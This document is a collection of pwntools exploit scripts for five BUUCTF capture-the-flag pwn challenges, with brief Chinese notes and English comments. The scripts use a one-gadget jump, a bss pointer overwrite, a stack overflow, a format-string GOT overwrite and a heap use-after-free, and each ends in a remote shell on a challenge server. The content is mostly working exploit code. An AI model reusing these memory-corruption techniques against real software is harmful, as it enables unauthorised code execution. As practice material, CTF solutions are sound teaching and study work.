1.onegadget

#!/usr/bin/python
#coding:utf-8

from pwn import *

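context.update(arch='amd64', os='linux', timeout=1)
context.log_level = 'debug'
if args.Q:
    io = remote('node3.buuoj.cn', 25018)
else:
    io = process('./one_gadget')

# libc matching the remote target; every offset below is only valid for this exact build.
libc = ELF('/mnt/hgfs/pwn/0-靶场/0-buuctf/libc/libc-2.29.so')
# Offset of the chosen one-gadget (an execve("/bin/sh") site inside libc) for this
# libc-2.29 build, as reported by the `one_gadget` tool.  Each candidate gadget has
# register/stack constraints that must hold at the moment it is reached; if this one
# does not give a shell, try the tool's other candidates for the same libc.
ONE_GADGET_OFF = 0x106ef8

# The first line presumably ends with the leaked printf address formatted as
# "0x" + 12 hex digits; [-15:-1] drops the trailing newline and keeps those 14 chars.
printf = int(io.recvline()[-15:-1], 16)
log.success('printf_leak==>' + hex(printf))
libc_base = printf - libc.sym['printf']
log.success('libc_base==>' + hex(libc_base))
# libc is mapped page-aligned; a non-aligned base means the leak was mis-parsed or the
# local libc does not match the remote one, and the computed gadget would be garbage.
if libc_base & 0xfff:
    raise ValueError('libc base %s is not page-aligned; check the leak parsing / libc version' % hex(libc_base))
one_gadget = libc_base + ONE_GADGET_OFF
# The target reads the address as a decimal number (no newline is appended).
io.sendafter('gadget:', str(one_gadget))
io.interactive()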

2.secret

  • 这题一开始没注意到 printf 那边的 buf，后来看到 TTY 师傅的脚本才突然开窍，这里借用其 exp。大致思路：通过 name 那边的 bss 溢出，修改计数那边的指针，然后通过发送正确的 secret 使该指针（推测是指针所指向的计数值）一路减少到 system 的地址，这样 printf 那边就变成了 system("/bin/sh")。
from pwn import*
context.log_level = 'debug'
# For a local run swap the remote() call below for process('./secret').
p = remote('node3.buuoj.cn', 25764)

elf = ELF('./secret')
# Print the two GOT slots the write-up reasons about (the exploit itself only needs
# them for reference: the pointer written below is a hard-coded constant).
for sym in ('printf', 'system'):
    log.success('%s_got==>%s' % (sym, hex(elf.got[sym])))
def function(index):
    """Send one secret value as a decimal line, then pause briefly so the target
    can process it before the next one arrives (it is not read back here)."""
    # p.recv()
    p.sendline('%d' % index)
    sleep(0.5)
p.recv()
# Overflow of the name field.  The first 16 bytes hold a NUL-terminated "/bin/sh"
# plus filler; the next three bytes partially overwrite an adjacent 8-byte pointer
# (presumably the counter pointer described in the write-up): only its low three
# bytes change, little-endian, giving 0x46d040 while the upper bytes are kept.
new_ptr = p64(0x46d040)[:3]          # == '\x40\xd0\x46'
payload = '/bin/sh\x00' + 'a' * 8 + new_ptr
p.sendline(payload)

# According to the write-up, each correct secret decrements the value behind the
# redirected pointer; after this sequence it is meant to equal system's address.
secrets = [
    0x476B, 0x2D38, 0x4540, 0x3E77, 0x3162,
    0x3F7D, 0x357A, 0x3CF5, 0x2F9E, 0x41EA,
    0x48D8, 0x2763, 0x474C, 0x3809, 0x2E63,
]
for secret in secrets:
    function(secret)
# Take the printf(buf) path, which per the write-up now runs system("/bin/sh").
p.sendline('1')
# function(0x2F4A)
# gdb.attach(p, 'b *0x401346')
# buf 0x46D080
p.interactive()

3.r2t3

  • 整数溢出。
#!/usr/bin/python
#coding:utf-8

from pwn import *

context.update(arch='i386', os='linux', timeout=1)
context.log_level = 'debug'
io = remote('node3.buuoj.cn', 27142) if args.Q else process('./r2t3')
# Address the overwritten return address jumps to (called `system` in the original
# script; presumably a backdoor/system call site in the binary -- confirm).
system = 0x804858e
# 0x15 bytes of filler reach the saved return address, followed by the target.
# The input is then padded to 0x400 bytes: the write-up calls this an integer
# overflow, presumably a length check that truncates/wraps so an input this long
# passes while a shorter overflowing one would not -- confirm in the binary.
filler = 'a' * 0x15
payload = (filler + p32(system)).ljust(0x400, 'a')
# gdb.attach(io); pause()   # uncomment for local debugging
io.sendafter('name:', payload)
io.interactive()

4.r2t4

#!/usr/bin/python
#coding:utf-8

from pwn import *

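context.update(arch='amd64', os='linux', timeout=1)
context.log_level = 'debug'
if args.Q:
    io = remote('node3.buuoj.cn', 29103)
else:
    io = process('./r2t4')
elf = ELF('./r2t4')   # loaded for reference; nothing below reads it

# Format-string write target: the slot at `check` is overwritten with the address
# of `backdoor`, so whatever later reads that slot ends up calling the backdoor.
# Its name and address (0x601018) suggest a GOT entry, presumably the stack-protector
# failure handler -- confirm against the binary.
backdoor = 0x400626
check = 0x601018

# '%7$p' was presumably the probe used to locate the input buffer on the stack.
# payload = '%7$p'.ljust(8, 'a') + 'aaaaaaaa'
hi = backdoor >> 16        # 0x0040 -> written with %hhn into check+2
lo = backdoor & 0xffff     # 0x0626 -> written with %hn  into check+0
# printf's output counter keeps running, so the second width is the difference:
# after hi + (lo - hi) characters the counter equals lo.  Requires lo >= hi.
if lo < hi:
    raise ValueError('write order assumes low half >= high half of backdoor')
fmt = '%' + str(hi) + 'c%10$hhn'
fmt += '%' + str(lo - hi) + 'c%11$hn'
# The pointers appended after the format text are positional args 10 and 11 only
# while they sit exactly at offset 0x20 of the input; a longer format text would
# shift them and silently break both writes.
if len(fmt) > 0x20:
    raise ValueError('format text is %d bytes; it must fit in 0x20' % len(fmt))
payload = fmt.ljust(0x20) + p64(check + 2) + p64(check)
# Padded to 0x30 bytes, presumably enough to trip the check that reads `check`.
payload = payload.ljust(0x30)
# gdb.attach(io, 'b *0x4006a1')
# pause()
io.sendline(payload)
print(io.recvline())
io.interactive()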

5.ydsneedgirlfriend2

  • 非常友好的堆题，简单得不想多说。
#!/usr/bin/python
#coding:utf-8

from pwn import *

context.update(arch='amd64', os='linux', timeout=1)
# context.log_level = 'debug'
# Address written into the freed object's function-pointer slot (see leak()).
system = 0x4006f0
io = remote('node3.buuoj.cn', 26797) if args.Q else process('./ydsneedgirlfriend2')
# Loaded for reference only: nothing in this script reads it, and the path is
# specific to the author's machine.
libc = ELF('/home/dingjie/libs/2.27-3ubuntu1_amd64/libc.so.6')


# Thin I/O shorthands over the connection above.
def sla(a, b):
    return io.sendlineafter(a, b)


def sa(a, b):
    return io.sendafter(a, b)


def sl(a):
    return io.sendline(a)


def ia():
    return io.interactive()


def ru(a):
    return io.recvuntil(a)


def rv(a):
    return io.recv(a)

def add(sz, ct='a'):
    """Menu option 1: create an entry whose name buffer is `sz` bytes, then send
    `ct` as its content (raw, no trailing newline, so it can carry binary data).

    Both prompts end in 'name:\\n' -- presumably a length prompt followed by the
    name prompt.
    """
    io.sendlineafter('choice :\n', '1')
    io.sendlineafter('name:\n', str(sz))
    io.sendafter('name:\n', ct)
def dele(idx):
    """Menu option 2: delete (free) the entry at `idx`."""
    io.sendlineafter('choice :\n', '2')
    io.sendlineafter('Index :', str(idx))
def show(idx):
    """Menu option 3: show the entry at `idx` (this is what fires the hijacked call)."""
    io.sendlineafter('choice :\n', '3')
    io.sendlineafter('Index :', str(idx))
	
def leak():
    """Pop a shell via reuse of a freed entry.  The name is historical: nothing is
    leaked here.

    Sequence (heap layout is not visible in this script; confirm with gdb):
      1. add(0x10)  -- create entry 0.
      2. dele(0)    -- free it; the index presumably stays usable (use-after-free).
      3. add(0x10, "/bin/sh" + NUL + p64(system)) -- the new 0x10-byte name buffer
         is presumably carved from the chunk that held entry 0's object, so these
         16 bytes overwrite that object's fields with the string and `system`.
      4. show(0)    -- acting on entry 0's clobbered fields ends up in system("/bin/sh").
    Drops into an interactive session afterwards.
    """
    add(0x10)
    dele(0)
    shell_obj = '/bin/sh\x00' + p64(system)
    add(0x10, shell_obj)
    show(0)
    io.interactive()
if __name__ == '__main__':
    # Entry point: run the whole exploit chain.
    leak()